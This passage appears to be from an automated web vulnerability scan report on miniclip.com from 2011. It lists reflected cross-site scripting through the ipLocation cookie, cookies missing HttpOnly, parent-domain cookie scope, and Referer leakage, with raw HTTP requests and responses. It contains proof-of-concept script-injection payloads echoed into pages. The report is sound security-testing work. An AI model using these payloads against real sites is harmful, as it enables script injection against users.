GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=USe0cf1</script><script>alert(1)</script>96e53526005 ; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:47:28 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:47:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=false; expires=Wed, 20-Jul-2011 11:52:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:28 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99562 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]... ricanfootballmedicon.jpg&mc_players_site=1&mc_gameUrl=%2Fgames%2Famerican-football%2Fen%2F&mc_sessid=2761004272941268992-1915725707-3144267629514981376&mc_v2=1&mc_ua=a111639&mc_geo=NapMia&mc_geoCode=USe0cf1</script><script>alert(1)</script>96e53526005 &loggedin=0&mc_width=590&mc_height=443", 'pluginspage','http://www.macromedia.com/shockwave/download/', 'logo','false', 'menu','false', 'swContextMenu','false', 'background','#000000'); document....[SNIP]...
1.30. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The value of the ipLocation cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34e16"><script>alert(1)</script>60cb7f36bea was submitted in the ipLocation cookie. This input was echoed as 34e16\"><script>alert(1)</script>60cb7f36bea in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US34e16"><script>alert(1)</script>60cb7f36bea ; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:47:15 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:47:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=false; expires=Wed, 20-Jul-2011 11:52:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:52:16 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99410 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]... <script type="text/javascript" src="/scripts/adserver/serve.php?t=4&p=US34e16\"><script>alert(1)</script>60cb7f36bea ,1,,">...[SNIP]...
1.31. http://www.miniclip.com/games/en/ [ipLocation cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/en/
Issue detail
The value of the ipLocation cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b4f8</script><script>alert(1)</script>326e11b5570 was submitted in the ipLocation cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://borneomanagement.com/ Cookie: ipLocation=US4b4f8</script><script>alert(1)</script>326e11b5570 ; language=en
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:44:21 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:44:21 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:homepage=false; expires=Wed, 20-Jul-2011 11:49:21 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:21 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:21 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99396 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <!-- TradeDoubler site verification 1775255 ...[SNIP]... setBodyMargin(); initTopTen(); if (detectUnityWebPlayer()) { statTracker("/unity/installed/"); } else { statTracker("/unity/not-installed/"); } statTracker('/u/country/en/us4b4f8</script><script>alert(1)</script>326e11b5570 /en-us%2cen%3bq%3d0.5/'); </script>...[SNIP]...
1.32. http://www.miniclip.com/games/en/ [ipLocation cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/en/
Issue detail
The value of the ipLocation cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 468f6"><script>alert(1)</script>5b25aa1fe98 was submitted in the ipLocation cookie. This input was echoed as 468f6\"><script>alert(1)</script>5b25aa1fe98 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /games/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://borneomanagement.com/ Cookie: ipLocation=US468f6"><script>alert(1)</script>5b25aa1fe98 ; language=en
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:44:16 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:44:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:homepage=false; expires=Wed, 20-Jul-2011 11:49:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:16 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:16 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99375 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <!-- TradeDoubler site verification 1775255 ...[SNIP]... <script type="text/javascript" src="/scripts/adserver/serve.php?t=4&p=US468f6\"><script>alert(1)</script>5b25aa1fe98 ,1,,">...[SNIP]...
2. Cookie without HttpOnly flag set
previous
next
There are 3 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
2.1. http://www.miniclip.com/php/services/indigo/p.php
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.miniclip.com
Path:
/php/services/indigo/p.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:PHPSESSID=5690022551196008448-1430424672-5107431497581723648; expires=Thu, 19 Jul 2012 11:47:16 GMT; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /php/services/indigo/p.php?c=page_visited&url=about:blank&t=1311162441977&ad_channel=1&ad_category=Array HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.miniclip.com Cookie: OAX=rcHW804mwDIABzb3
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:47:16 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8Set-Cookie: PHPSESSID=5690022551196008448-1430424672-5107431497581723648; expires=Thu, 19 Jul 2012 11:47:16 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,...........D..;
2.2. http://www.miniclip.com/games/american-football/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:46:33 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=true; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.comSet-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99299 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]...
2.3. http://www.miniclip.com/games/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/en/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://borneomanagement.com/ Cookie: ipLocation=US; language=en
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:43:54 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:43:54 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.comSet-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 100369 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <!-- TradeDoubler site verification 1775255 ...[SNIP]...
3. Cookie scoped to parent domain
previous
next
There are 2 instances of this issue:
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
3.1. http://www.miniclip.com/games/american-football/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/american-football/en/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/american-football/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:46:33 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:gamepage=true; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.comSet-Cookie: ad_is_enabled-showcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:gamepage=false; expires=Wed, 20-Jul-2011 11:51:33 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 99299 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>American Football - American Footbal...[SNIP]...
3.2. http://www.miniclip.com/games/en/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/games/en/
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/en/ HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://borneomanagement.com/ Cookie: ipLocation=US; language=en
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:43:54 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:43:54 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.comSet-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:48:55 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 100369 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <!-- TradeDoubler site verification 1775255 ...[SNIP]...
4. Cross-domain Referer leakage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/js.php
Issue detail
The page was loaded from a URL containing a query string:http://www.miniclip.com/scripts/js.php?f=global,AC_RunActiveContent,AC_ActiveX,tooltips,quicksearch,credits,facebook,mcto,swfobject,oas/oas_home_games&dc=201134 The response contains the following links to other domains:http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab http://www.icq.com/
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /scripts/js.php?f=global,AC_RunActiveContent,AC_ActiveX,tooltips,quicksearch,credits,facebook,mcto,swfobject,oas/oas_home_games&dc=201134 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:43:20 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 21 Jul 2011 11:43:20 GMT Cache-Control: max-age=86400, must-revalidate Last-Modified: Thu, 21 Jul 2011 11:43:20 GMT Etag: e50777e8d9f5d191fda8068f0bdb4c32 Vary: Accept-Encoding Content-Type: text/javascript Content-Length: 117907 /* [INCLUDE FILE] global */ // Sharing module behaviour function toggleSharingModulePopup(){ var sharingBox = document.getElementById("sharingModulePopup"); if (sharingBox.style.display == "none") ...[SNIP]... ined){ hpto_MPU_URL = hpto.MpuURL; if (hpto.ClickURL != undefined){ hpto_MPU_URL = hpto_MPU_URL + '?clickTag=' + encodeURIComponent(hpto.ClickURL.replace('[timestamp]',ord)); } takeoverEmbed = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="Ad_that_changes_background_AS1" width="300" height="250" align="middle"> <param name="allowScriptAccess" value="sameDomain" />...[SNIP]... <li class="icq-logo"><a href="http://www.icq.com"> icq</a>...[SNIP]... ){ if (takeoverClickUrl != undefined){ takeoverMpuSwf = takeoverMpuSwf + '?clickTag=' + encodeURIComponent(takeoverClickUrl.replace('[timestamp]',ord)); } // Build MPU code takeoverMpuCode = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" 